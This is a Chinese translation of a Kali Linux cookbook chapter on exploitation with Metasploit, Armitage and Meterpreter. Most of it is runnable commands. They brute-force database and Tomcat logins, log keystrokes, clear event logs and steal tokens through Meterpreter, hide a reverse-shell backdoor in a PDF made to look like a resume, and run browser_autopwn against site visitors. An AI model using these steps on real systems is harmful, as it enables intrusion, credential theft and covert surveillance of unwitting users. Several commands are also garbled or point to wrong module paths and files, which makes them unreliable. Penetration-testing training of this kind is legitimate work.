摘要:這是執(zhí)行漏洞利用的語(yǔ)法。同時(shí)注意當(dāng)加載完成時(shí),會(huì)顯示可用的漏洞利用列表。為了展示可用于此次漏洞利用的選項(xiàng)列表,我們使用模式??梢怨芾砟愕臅?huì)話,而執(zhí)行實(shí)際的載荷分發(fā)和漏洞利用工作。殺掉受害者系統(tǒng)的指定進(jìn)程,使用語(yǔ)法。
第六章 漏洞利用
簡(jiǎn)介作者:Willie L. Pritchett, David De Smet
譯者:飛龍
協(xié)議:CC BY-NC-SA 4.0
一旦我們完成了漏洞掃描步驟,我們就了解了必要的知識(shí)來(lái)嘗試?yán)媚繕?biāo)系統(tǒng)上的漏洞。這一章中,我們會(huì)使用不同的工具來(lái)操作,包括系統(tǒng)測(cè)試的瑞士軍刀 Metasploit。
6.1 安裝和配置 Metasploitable這個(gè)秘籍中,我們會(huì)安裝、配置和啟動(dòng) Metasploitable 2。 Metasploitable 是基于 Linux 的操作系統(tǒng),擁有多種可被 Metasploit 攻擊的漏洞。它由 Rapid7 (Metasploit 框架的所有者)設(shè)計(jì)。Metasploitable 是個(gè)熟悉 Meterpreter 用法的極好方式。
準(zhǔn)備為了執(zhí)行這個(gè)秘籍,我們需要下列東西:
互聯(lián)網(wǎng)連接
VirtualBox PC 上的可用空間
解壓縮工具(這里我們使用 Windows 上的 7-Zip)
操作步驟讓我們開始下載 Metasploitable 2。最安全的選擇是從 SourceForge 獲取下載包:
從這個(gè)鏈接下載 Metasploitable 2:http://sourceforge.net/ proje...。
將文件包括到硬盤的某個(gè)位置。
解壓文件。
將文件夾內(nèi)容放到你儲(chǔ)存虛擬磁盤文件的位置。
打開 VirtualBox 并點(diǎn)擊New按鈕:
![](http://git.oschina.net/wizardforcel/kali-linux-cookbook-zh/raw/master/img/6-1-1.jpg)
點(diǎn)擊Next。
![](http://git.oschina.net/wizardforcel/kali-linux-cookbook-zh/raw/master/img/6-1-2.jpg)
輸入 Metasploitable 2 的名稱并將Operating System: 選擇為Linux,Version: 選項(xiàng)Ubuntu。像下面的截圖那樣點(diǎn)擊Next。
![](http://git.oschina.net/wizardforcel/kali-linux-cookbook-zh/raw/master/img/6-1-3.jpg)
如果可用的話,選擇 512 MB,并點(diǎn)擊Next。
![](http://git.oschina.net/wizardforcel/kali-linux-cookbook-zh/raw/master/img/6-1-4.jpg)
選項(xiàng)現(xiàn)有磁盤,并從你下載和保存 Metasploitable 2 文件夾的地方選擇 VDMK 文件。
![](http://git.oschina.net/wizardforcel/kali-linux-cookbook-zh/raw/master/img/6-1-5.jpg)
你的虛擬磁盤窗口會(huì)像下面的截圖那樣。在這個(gè)示例中,我們完全不需要更新磁盤空間。這是因?yàn)槭褂?Metasploitable 的時(shí)候,你會(huì)攻擊這個(gè)系統(tǒng),而并不是將它用作操作系統(tǒng)。
![](http://git.oschina.net/wizardforcel/kali-linux-cookbook-zh/raw/master/img/6-1-6.jpg)
點(diǎn)擊Create。
![](http://git.oschina.net/wizardforcel/kali-linux-cookbook-zh/raw/master/img/6-1-7.jpg)
通過(guò)點(diǎn)擊 Metasploitable 2 的名稱和Start按鈕來(lái)啟動(dòng)它。
工作原理這個(gè)秘籍中,我們?cè)?Virtualbox 中配置了 Metasploitable 2。我們以從Sourceforge.net下載 Metasploitable 開始這個(gè)秘籍,之后我們配置了 VDMK 來(lái)在 VirtualBox 中運(yùn)行并以啟動(dòng)該系統(tǒng)結(jié)束。
6.2 掌握 Armitage,Metasploit 的圖形管理工具新版本的 Metasploit 使用叫做 Armitage 的圖形化前端工具。理解 Armitage 非常重要,因?yàn)樗ㄟ^(guò)提供可視化的信息,使你對(duì) Metasploit 的使用變得簡(jiǎn)單。它封裝了 Metasploit 控制臺(tái),并且通過(guò)使用它的列表功能,你可以一次看到比 Metasploit 控制臺(tái)或 Meterpreter 會(huì)話更多的內(nèi)容。
準(zhǔn)備需要互聯(lián)網(wǎng)或內(nèi)部網(wǎng)絡(luò)的連接。
操作步驟讓我們開始操作 Armitage:
從桌面上訪問(wèn)Start | Kali Linux | Exploitation Tools | Network Exploitation Tools | Armitage。
在 Armitage的登錄界面中,點(diǎn)擊Connect(連接)按鈕。
Armitage 可能需要一些時(shí)間來(lái)連接 Metasploit。當(dāng)它完成時(shí),你可能看見下面的提示窗口。不要驚慌,一旦 Armitage 能夠連接時(shí),它會(huì)消失的。在 Start Metaspoit?界面,點(diǎn)擊Yes:
隨后你會(huì)看到 Armitage 的主窗口。我們現(xiàn)在討論主窗口的三個(gè)區(qū)域(標(biāo)記為A、B和C,在下面的截圖中)。
A:這個(gè)區(qū)域展示了預(yù)先配置的模塊。你可以通過(guò)模塊列表下面的搜索框來(lái)搜索。
B:這個(gè)區(qū)域展示了你的活動(dòng)目標(biāo),我們能夠利用它的漏洞。
C:這個(gè)區(qū)域展示了多個(gè) Metasploit 標(biāo)簽頁(yè)。它允許多個(gè) Meterpreter 或控制臺(tái)會(huì)話同時(shí)運(yùn)行和展示。
另見啟動(dòng) Armitage 的一個(gè)自動(dòng)化方式就是在終端窗口中鍵入下列命令。
armitage
為了了解更多 Meterpreter 的信息,請(qǐng)見“掌握 Meterpreter”一節(jié)。
6.3 掌握 Metasploit 控制臺(tái)(MSFCONSOLE)這個(gè)秘籍中,我們會(huì)研究 Metasploit 控制臺(tái)(MSFCONSOLE)。MSFCONSOLE主要用于管理 Metasploit 數(shù)據(jù)庫(kù),管理會(huì)話以及配置和啟動(dòng) Metasploit 模塊。本質(zhì)上,出于利用漏洞的目的,MSFCONSOLE 能夠讓你連接到主機(jī),便于你利用它的漏洞。
你可以使用以下命令來(lái)和控制臺(tái)交互:
help:這個(gè)命令允許你查看你嘗試運(yùn)行的命令行的幫助文檔。
use module:這個(gè)命令允許你開始配置所選擇的模塊。
set optionname module:這個(gè)命令允許你為指定的模塊配置不同的選項(xiàng)。
exploit:這個(gè)命令啟動(dòng)漏洞利用模塊。
run:這個(gè)命令啟動(dòng)非漏洞利用模塊。
search module:這個(gè)命令允許你搜索獨(dú)立模塊。
exit:這個(gè)命令允許你退出 MSFCONSOLE。
準(zhǔn)備需要互聯(lián)網(wǎng)或內(nèi)部網(wǎng)絡(luò)的連接。
操作步驟讓我們開始探索 MSFCONSOLE:
打開命令行。
通過(guò)下列命令啟動(dòng) MSFCONSOLE:
msfconsole
通過(guò)search命令搜索所有可用的 Linux 模塊。每次我們打算執(zhí)行操作時(shí),都搜索一遍模塊通常是個(gè)好主意。主要因?yàn)樵?Metasploit 的不同版本之間,模塊路徑可能發(fā)生改變。
search linux
使用 John the Ripper Linux 密碼破解模塊。
use auxiliary/analyzse/jtr_linux
通過(guò)下列命令展示該模塊的可用選項(xiàng)。
show options
既然我們列出了可以對(duì)這個(gè)模塊使用的選項(xiàng),我們可以使用set命令來(lái)設(shè)置獨(dú)立選項(xiàng)。讓我們?cè)O(shè)置JOHN_PATH選項(xiàng):
set JOHN_PATH /usr/share/metasploit-framework/data/john/wordlists/ password.lst
現(xiàn)在執(zhí)行漏洞利用,我們需要輸入exploit命令:
exploit更多
一旦你通過(guò) MSFCONSOLE 獲得了主機(jī)的訪問(wèn),你需要使用 Meterpreter 來(lái)分發(fā)載荷。MSFCONSOLE 可以管理你的回話,而 Meterpreter 執(zhí)行實(shí)際的載荷分發(fā)和漏洞利用工作。
6.4 掌握 Metasploit CLI(MSFCLI)這個(gè)秘籍中,我們會(huì)探索 Metasploit CLI(MSFCLI)。Metasploit 需要接口來(lái)執(zhí)行它的任務(wù)。MSFCLI 就是這樣的接口。它是一個(gè)極好的接口,用于學(xué)習(xí) Metasploit ,或測(cè)試/編寫新的漏洞利用。它也可用于腳本的情況中,并且對(duì)任務(wù)使用基本的自動(dòng)化。
使用 MSFCLI 的一個(gè)主要問(wèn)題是,你只能夠一次打開一個(gè) shell。你也會(huì)注意到,當(dāng)我們探索一些命令的時(shí)候,它比 MSFCONSOLE 慢并且復(fù)雜。最后,你需要知道你打算利用的具體漏洞來(lái)使用 MSFCLI。這會(huì)使它對(duì)于滲透測(cè)試新手有些難以使用,他們并不熟悉 Metasploit 漏洞利用列表。
MSFCLI 的一些命令是:
msfcli:這會(huì)加載 MSFCLI 可訪問(wèn)的所有可用漏洞利用列表。
msfcli -h:顯示 MSFCLI 的幫助文檔。
msfcli [PATH TO EXPLOIT] [options = value]:這是執(zhí)行漏洞利用的語(yǔ)法。
準(zhǔn)備需要互聯(lián)網(wǎng)或內(nèi)部網(wǎng)絡(luò)的連接。
操作步驟讓我們開始探索 MSFCLI:
使用下列命令啟動(dòng) Metasploit CLI (MSFCLI)。請(qǐng)耐心等待,因?yàn)檫@可能花一些時(shí)間,取決于你的系統(tǒng)速度。同時(shí)注意當(dāng) MSFCLI 加載完成時(shí),會(huì)顯示可用的漏洞利用列表。
msfcli
顯示 MSFCLI 幫助文檔:
msfcli -h
出于我們的演示目的,我們會(huì)執(zhí)行圣誕樹掃描( Christmas Tree Scan)。我們會(huì)選擇選項(xiàng) A 來(lái)顯示模塊高級(jí)選項(xiàng)。
msfcli auxiliary/scanner/portscan/xmas A
更多圣誕樹掃描的信息,請(qǐng)見下面的 URL:http://en.wikipedia.org/wiki/...。
此外,你可以列出當(dāng)前模塊的概覽,通過(guò)使用S模式。概覽模式是一個(gè)極好方式,來(lái)查看可用于當(dāng)前嘗試執(zhí)行的漏洞利用的所有選項(xiàng)。許多選項(xiàng)都是可選的,但是一小部分通常是必須的,它們?cè)试S你設(shè)置嘗試?yán)媚膫€(gè)目標(biāo)或端口的漏洞。
msfcli auxiliary/scanner/portscan/xmas S
為了展示可用于此次漏洞利用的選項(xiàng)列表,我們使用O模式。選項(xiàng)使用中配置漏洞利用模塊的方式。每個(gè)利用模塊都用不同的選項(xiàng)集合(或者什么都沒(méi)有)。任何所需的選項(xiàng)必須在漏洞利用執(zhí)行之前設(shè)置。在下面的截圖中,你會(huì)注意到許多所需選項(xiàng)都設(shè)為默認(rèn)。如果你碰到了這種情況,你就不需要更新選項(xiàng)的值,除非你打算修改它。
msfcli auxiliary/scanner/portscan/xmas O
我們使用E模式來(lái)執(zhí)行漏洞利用。
msfcli auxiliary/scanner/portscan/xmas E
工作原理這里,我們使用了默認(rèn)選項(xiàng)。
這個(gè)秘籍中,我們以啟動(dòng) MSFCLI 開始,之后搜索可用的模塊,并執(zhí)行該模塊。在搜索的過(guò)程中,我們選修了圣誕樹掃描模塊并復(fù)查了 MSFCLI 界面來(lái)查看模塊概覽和所有可用選項(xiàng)。在設(shè)置完所有選項(xiàng)之后,我們執(zhí)行了漏洞利用。
了解 Metasploit 框架分為三個(gè)不同的部分非常重要。這些部分是:
漏洞:這些都是弱點(diǎn),要么已知要么位置。它們包含在特定的應(yīng)用、阮家寶或協(xié)議中。在 Metasploit 中,漏洞按照分組,和漏洞利用列出,漏洞利用可以攻擊列在它們下面的漏洞。
漏洞利用:漏洞利用是用來(lái)利用所發(fā)現(xiàn)漏洞的模塊。
載荷:一旦成功執(zhí)行了漏洞利用,必須把載荷傳給被攻擊的機(jī)器,以便允許我們創(chuàng)建 shell,運(yùn)行各種命令,添加用戶以及其它。
一旦你通過(guò) MSFCONSOLE 獲得了主機(jī)的訪問(wèn),你需要使用 Meterpreter 來(lái)分發(fā)載荷。MSFCONSOLE 可以管理你的會(huì)話,而 Meterpreter 執(zhí)行實(shí)際的載荷分發(fā)和漏洞利用工作。
6.5 掌握 Meterpreter一旦你使用 Armitage,MSFCLI 或 MSFCONSOLE 獲得了主機(jī)的訪問(wèn)權(quán),你必須使用 Meterpreter 來(lái)傳遞你的載荷。MSFCONSOLE 可以管理你的會(huì)話,而 Meterpreter 執(zhí)行實(shí)際的載荷分發(fā)和漏洞利用工作。
一些用于 Meterpreter 的常用命令包括:
help:這個(gè)命令允許你瀏覽幫助文檔。
background:這個(gè)命令允許你在后臺(tái)運(yùn)行 Meterpreter 會(huì)話。這個(gè)命令也能為你帶回 MSF 提示符。
download:這個(gè)命令允許你從受害者機(jī)器中下載文件。
upload:這個(gè)命令允許你向受害者機(jī)器上傳文件。
execute:這個(gè)命令允許你在受害者機(jī)器上運(yùn)行命令。
shell:這個(gè)命令允許你在受害者機(jī)器上運(yùn)行 Windows shell 提示符(僅限于 Windows 主機(jī))。
session -i:這個(gè)命令允許你在會(huì)話之間切換。
準(zhǔn)備需要滿足下列要求:
內(nèi)部網(wǎng)絡(luò)或互聯(lián)網(wǎng)的連接。
使用 Armitage,MSFCLI 或 MSFCONSOLE 由 Metasploit 創(chuàng)建好的,目標(biāo)系統(tǒng)的活動(dòng)會(huì)話。
操作步驟讓我們打開 MSFCONSOLE 來(lái)開始:
首先我們以 MSFCONSOLE 中展示的活動(dòng)會(huì)話開始。
開始記錄目標(biāo)系統(tǒng)中用戶的擊鍵順序:
keyscan_start
轉(zhuǎn)儲(chǔ)目標(biāo)系統(tǒng)中用戶的擊鍵順序。擊鍵順序會(huì)顯示在屏幕上:
keyscan_dump
停止記錄目標(biāo)系統(tǒng)中用戶的擊鍵順序。
keyscan_stop
刪除目標(biāo)系統(tǒng)中的文件。
del exploited.docx
清除目標(biāo)系統(tǒng)中的事件日志。
clearav
展示運(yùn)行進(jìn)程的列表。
ps
殺掉受害者系統(tǒng)的指定進(jìn)程,使用kill [pid]語(yǔ)法。
kill 6353
嘗試偷取目標(biāo)系統(tǒng)上的模擬令牌。
steal_token工作原理
我們以通過(guò) Armitage,MSFCLI 或 MSFCONSOLE 預(yù)先建立的 Meterpreter 會(huì)話來(lái)開始。之后我們?cè)谀繕?biāo)機(jī)器上運(yùn)行了多種命令。
更多當(dāng)我們對(duì)基于 Linux 主機(jī)使用 Meterpreter 的時(shí)候,我們能夠在它上面運(yùn)行 Linux 命令,就像我們操作這臺(tái)機(jī)器那樣。
6.6 Metasploitable MySQL這個(gè)秘籍中,我們會(huì)探索如何使用 Metasploit 來(lái)攻擊 MySQL 數(shù)據(jù)庫(kù)服務(wù)器,使用 MySQL 掃描器模塊。MySQL 是許多網(wǎng)站平臺(tái)的選擇,包括 Drupal 和 Wordpress,許多網(wǎng)站當(dāng)前正在使用 MySQL 數(shù)據(jù)庫(kù)服務(wù)器。這會(huì)使它們更容易成為 Metasploitable MySQL 攻擊的目標(biāo)。
準(zhǔn)備需要滿足下列要求:
內(nèi)部網(wǎng)絡(luò)的連接。
運(yùn)行在滲透環(huán)境中的 Metasploitable 。
用于執(zhí)行字典攻擊的單詞列表。
操作步驟讓我們通過(guò)打開終端窗口來(lái)開始 MySQL 攻擊:
打開終端窗口。
啟動(dòng) MSFCONSOLE。
msfconsole
搜索可用的 MySQL 模塊。
msfconsole mysql
使用 MySQL 掃描器模塊。
use auxiliary/scanner/mysql/mysql_login
顯示模塊的可用選項(xiàng)。
show options
將 RHOST 設(shè)置為 Metasploitable 2 主機(jī)或目標(biāo)主機(jī)的地址。
set RHOST 192.168.10.111
設(shè)置用戶名文件的位置。你可以選擇:
set user_file /root/Desktop/usernames.txt
設(shè)置密碼文件的位置。你可以選擇:
set pass_file /root/Desktop/passwords.txt
執(zhí)行漏洞利用:
Exploit
Metasploit 會(huì)嘗試輸入包含在兩個(gè)文件中的所有用戶名和密碼組合。找到生效的登錄和密碼組合旁邊的+符號(hào)就可以了。
工作原理這個(gè)秘籍中,我們使用 Metasploit 的 MSFCONSOLE 來(lái)利用 Metasploitable 2 靶機(jī)上的 MySQL 漏洞。我們以啟動(dòng)控制臺(tái)并搜索所有已知的 MySQL 模塊來(lái)開始。在選擇 MySQL 登錄利用模塊之后,我們?cè)O(shè)置了選項(xiàng)并執(zhí)行了漏洞利用,這讓我們能夠爆破 MySQL 登錄。Metasploit 使用提供的用戶名和密碼文件。并嘗試爆破 MySQL 數(shù)據(jù)庫(kù)。
更多這個(gè)秘籍中,我們使用了自己生成的用戶名和密碼文件。有許多方法可以生成用戶名和密碼單詞列表,這些方法在第八章中涉及。
6.7 Metasploitable PostgreSQL這個(gè)秘籍中,我們會(huì)探索如何使用 Metasploit 來(lái)攻擊 PostgreSQL 數(shù)據(jù)庫(kù)服務(wù)器,使用 PostgreSQL 掃描器模塊。PostgreSQL 被譽(yù)為全世界最先進(jìn)的開源數(shù)據(jù)庫(kù),許多愛(ài)好者聲稱它是企業(yè)級(jí)的數(shù)據(jù)庫(kù)。我們會(huì)使用 Metasploit 來(lái)爆破 PostgreSQL 登錄。
準(zhǔn)備需要滿足下列要求:
內(nèi)部網(wǎng)絡(luò)的連接。
運(yùn)行在滲透環(huán)境中的 Metasploitable 。
用于執(zhí)行字典攻擊的單詞列表。
操作步驟讓我們通過(guò)打開終端窗口來(lái)開始 PostgreSQL 攻擊:
打開終端窗口。
啟動(dòng) MSFCONSOLE。
msfconsole
搜索可用的 PostgreSQL 模塊。
msfconsole postgresql
使用 PostgreSQL 掃描器模塊。
use auxiliary/scanner/mysql/postgres_login
顯示模塊的可用選項(xiàng)。
show options
將 RHOST 設(shè)置為 Metasploitable 2 主機(jī)或目標(biāo)主機(jī)的地址。
set RHOST 192.168.10.111
設(shè)置用戶名文件的位置。你可以選擇:
set user_file /root/Desktop/usernames.txt
設(shè)置密碼文件的位置。你可以選擇:
set pass_file /root/Desktop/passwords.txt
執(zhí)行漏洞利用:
Exploit
Metasploit 會(huì)嘗試輸入包含在兩個(gè)文件中的所有用戶名和密碼組合。找到生效的登錄和密碼組合旁邊的+符號(hào)就可以了。
工作原理這個(gè)秘籍中,我們使用 Metasploit 的 MSFCONSOLE 來(lái)利用 Metasploitable 2 靶機(jī)上的 PostgreSQL 漏洞。我們以啟動(dòng)控制臺(tái)并搜索所有已知的 PostgreSQL 模塊來(lái)開始。在選擇 PostgreSQL 登錄利用模塊之后,我們?cè)O(shè)置了選項(xiàng)并執(zhí)行了漏洞利用,這讓我們能夠爆破 PostgreSQL 登錄。Metasploit 使用提供的用戶名和密碼文件。并嘗試爆破 PostgreSQL 數(shù)據(jù)庫(kù)。之后找到生效的登錄和密碼組合旁邊的+符號(hào)就可以了。
更多這個(gè)秘籍中,我們使用了默認(rèn)的 PostgreSQL 用戶名和密碼文件。然而我們也可以創(chuàng)建自己的文件。有許多方法可以生成用戶名和密碼單詞列表,這些方法在第八章中涉及。
6.8 Metasploitable Tomcat這個(gè)秘籍中,我們會(huì)探索如何使用 Metasploit 攻擊 Tomcat 服務(wù)器,使用 Tomcat Manager Login 模塊。Tomcat,或 Apache Tomcat,是開源的 Web 服務(wù)器,和 Servlet 容器,用于運(yùn)行 Java Servt 和 JSP。Tomcat 服務(wù)器純粹使用 Java 編寫。我們會(huì)使用 Metasploit 來(lái)爆破 Tomcat 的登錄。
準(zhǔn)備需要滿足下列要求:
內(nèi)部網(wǎng)絡(luò)的連接。
運(yùn)行在滲透環(huán)境中的 Metasploitable 。
用于執(zhí)行字典攻擊的單詞列表。
操作步驟讓我們通過(guò)打開終端窗口來(lái)開始這個(gè)秘籍:
打開終端窗口。
啟動(dòng) MSFCONSOLE。
msfconsole
搜索可用的 Tomcat 模塊。
msfconsole tomcat
使用 Tomcat Application Manager Login Utility。
use auxiliary/scanner/http/tomcat_mgr_login
顯示模塊的可用選項(xiàng)。
show options
要注意我們有很多設(shè)置為“是”的項(xiàng)目,它們都是必須的。我們使用它們的默認(rèn)值。
設(shè)置Pass_File:
PASS_FILE meset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
設(shè)置Pass_File:
USER_FILE mset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
設(shè)置目標(biāo)的RHOST,這里我們選擇我們的 Metasploitable 2 主機(jī):
set RHOSTS 192.168.10.111
將RPORT設(shè)置為 8180:
set RPORT 8180
執(zhí)行漏洞利用:
Exploit工作原理
這個(gè)秘籍中,我們使用 Metasploit 的 MSFCONSOLE 來(lái)利用 Metasploitable 2 靶機(jī)上的 Tomcat 漏洞。我們以啟動(dòng)控制臺(tái)并搜索所有已知的 Tomcat 模塊來(lái)開始。在選擇 Tomcat 登錄利用模塊之后,我們?cè)O(shè)置了選項(xiàng)并執(zhí)行了漏洞利用,這讓我們能夠爆破 Tomcat 登錄。Metasploit 使用提供的用戶名和密碼文件。并嘗試爆破 Tomcat 數(shù)據(jù)庫(kù)。之后找到生效的登錄和密碼組合旁邊的+符號(hào)就可以了。
6.9 Metasploitable PDF這個(gè)秘籍中,我們會(huì)探索如何使用 Metasploit 來(lái)執(zhí)行攻擊,使用 Adobe PDF 內(nèi)嵌模塊來(lái)利用 PDF 文檔漏洞。Adobe PDF 是文檔傳輸?shù)臉?biāo)準(zhǔn)。由于它的廣泛使用,尤其是由于它的商業(yè)用途,我們會(huì)通過(guò)讓用戶認(rèn)為他們打開了來(lái)自求職崗位的正常 PDF 文檔來(lái)攻擊用戶的機(jī)器。
準(zhǔn)備需要滿足下列要求:
內(nèi)部網(wǎng)絡(luò)的連接。
運(yùn)行在滲透環(huán)境中的 Metasploitable 。
用于執(zhí)行字典攻擊的單詞列表。
操作步驟讓我們通過(guò)打開終端窗口來(lái)開始這個(gè)秘籍:
打開終端窗口。
啟動(dòng) MSFCONSOLE。
msfconsole
搜索可用的 PDF 模塊。
msfconsole pdf
使用 PDF 內(nèi)嵌模塊:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
顯示模塊的可用選項(xiàng)。
show options
設(shè)置我們想要生成的 PDF 文件名稱:
set FILENAME evildocument.pdf
設(shè)置 INFILENAME 選項(xiàng)。它是你打算使用的 PDF 文件的位置。這里,我使用桌面上的簡(jiǎn)歷。
set INFILENAME /root/Desktop/willie.pdf
要注意,這個(gè)模塊的所有選項(xiàng)都是可選的,除了INFILENAME 。
執(zhí)行漏洞利用:
Exploit工作原理
這個(gè)秘籍中,我們使用 Metasploit 的 MSFCONSOLE 創(chuàng)建了包含 Meterpreter 后門的 PDF 文件。我們以啟動(dòng)控制臺(tái)并搜索所有可用的 PDF 漏洞來(lái)開始。在選擇 PDF 內(nèi)嵌模塊之后,我們?cè)O(shè)置選項(xiàng)并執(zhí)行漏洞利用,這讓我們?cè)谡5?PDF 中埋下后門程序。Metasploit 會(huì)生成帶有 Windows 反向 TCP 載荷的 PDF。當(dāng)你的目標(biāo)打開 PDF 文件時(shí),Meterpreter 會(huì)開啟答復(fù)并激活會(huì)話。
6.10 實(shí)現(xiàn) browser_autopwn瀏覽器 Autopwn 是 Metasploit 提供的輔助模塊,在受害者訪問(wèn)網(wǎng)頁(yè)時(shí),讓你能夠自動(dòng)化對(duì)它們的攻擊。瀏覽器 Autopwn 在攻擊之前指定客戶端的指紋識(shí)別,也就是說(shuō)他不會(huì)對(duì) IE 7 嘗試?yán)?Firefox 的漏洞?;谒臑g覽器判斷,它決定最適于實(shí)施哪個(gè)漏洞利用。
準(zhǔn)備需要互聯(lián)網(wǎng)或內(nèi)部網(wǎng)絡(luò)的連接。
操作步驟讓我們通過(guò)打開終端窗口來(lái)開始這個(gè)秘籍:
打開終端窗口。
啟動(dòng) MSFCONSOLE:
msfconsole
搜索可用的 autopwn 模塊。
msfconsole autopwn
使用 browser_autopwn 模塊:
Use auxiliary/server/browser_autopwn
設(shè)置我們的載荷,這里我們使用 Windows 反向 TCP:
set payload windows/meterpreter/reverse_tcp
顯示可用于該載荷類型的選項(xiàng)。
show options
設(shè)置反向連接所使用的 IP。這里,該 PC 的 IP 地址為 192.168.10.109。
set LHOST 192.168.10.109
下面,我們打算設(shè)置 URIPATH,這里我們使用"filetypes"(帶引號(hào)):
set URIPATH "filetypes"
最后,我們執(zhí)行漏洞利用:
exploit
Metasploit 會(huì)在 IP 地址 http://[Provided IP Address]:... 處執(zhí)行漏洞利用。
當(dāng)訪問(wèn)者訪問(wèn)這個(gè)地址時(shí),browser_autopwn模塊嘗試連接用戶的機(jī)器來(lái)建立遠(yuǎn)程會(huì)話。如果成功的話,Meterpreter 會(huì)確認(rèn)這個(gè)會(huì)話。使用會(huì)話命令來(lái)激活它:
session –I 1
為了顯示我們可以使用的 Meterpreter 命令列表,輸入help。
help
會(huì)顯示可用命令的列表。這里,我們啟動(dòng)擊鍵順序掃描:
keyscan_start
為了得到受害者機(jī)器上的擊鍵順序,我們鍵入keyscan_start命令:
keyscan_dump工作原理
這個(gè)秘籍中,我們使用 Metasploit 的 MSFCONSOLE 來(lái)執(zhí)行 browser_autopwn 漏洞利用。我們以啟動(dòng)控制臺(tái)并搜索所有已知的autopwn模塊開始。在喧囂autopwn模塊之后,我們將載荷設(shè)置為windows_reverse_tcp。這允許我們?cè)诶贸晒r(shí)得到返回的鏈接。一旦受害者訪問(wèn)了我們的網(wǎng)頁(yè),漏洞利用就成功了,我們就能得到 Meterpreter 活動(dòng)會(huì)話。
文章版權(quán)歸作者所有,未經(jīng)允許請(qǐng)勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。
轉(zhuǎn)載請(qǐng)注明本文地址:http://systransis.cn/yun/11212.html
摘要:第五章漏洞評(píng)估作者譯者飛龍協(xié)議簡(jiǎn)介掃描和識(shí)別目標(biāo)的漏洞通常被滲透測(cè)試者看做無(wú)聊的任務(wù)之一。家庭版的有效許可證。在標(biāo)簽頁(yè)中,選擇并選擇下列特定的漏洞。。漏洞會(huì)詳細(xì)列出。發(fā)現(xiàn)特定的漏洞在這個(gè)秘籍中,我們會(huì)使用探索如何發(fā)現(xiàn)特定漏洞。 第五章 漏洞評(píng)估 作者:Willie L. Pritchett, David De Smet 譯者:飛龍 協(xié)議:CC BY-NC-SA 4.0 簡(jiǎn)介 掃描和...
摘要:第三章高級(jí)測(cè)試環(huán)境作者譯者飛龍協(xié)議簡(jiǎn)介既然我們已經(jīng)了解了所包含的工具,現(xiàn)在我們要調(diào)查一些真實(shí)世界的場(chǎng)景。下載靶機(jī)到目前為止,以及可見的未來(lái)中,微軟的系統(tǒng)都是許多個(gè)人和企業(yè)所選的操作系統(tǒng)。 第三章 高級(jí)測(cè)試環(huán)境 作者:Willie L. Pritchett, David De Smet 譯者:飛龍 協(xié)議:CC BY-NC-SA 4.0 簡(jiǎn)介 既然我們已經(jīng)了解了 Kali Linux ...
閱讀 3372·2021-11-04 16:10
閱讀 3871·2021-09-29 09:43
閱讀 2707·2021-09-24 10:24
閱讀 3371·2021-09-01 10:46
閱讀 2519·2019-08-30 15:54
閱讀 602·2019-08-30 13:19
閱讀 3245·2019-08-29 17:19
閱讀 1066·2019-08-29 16:40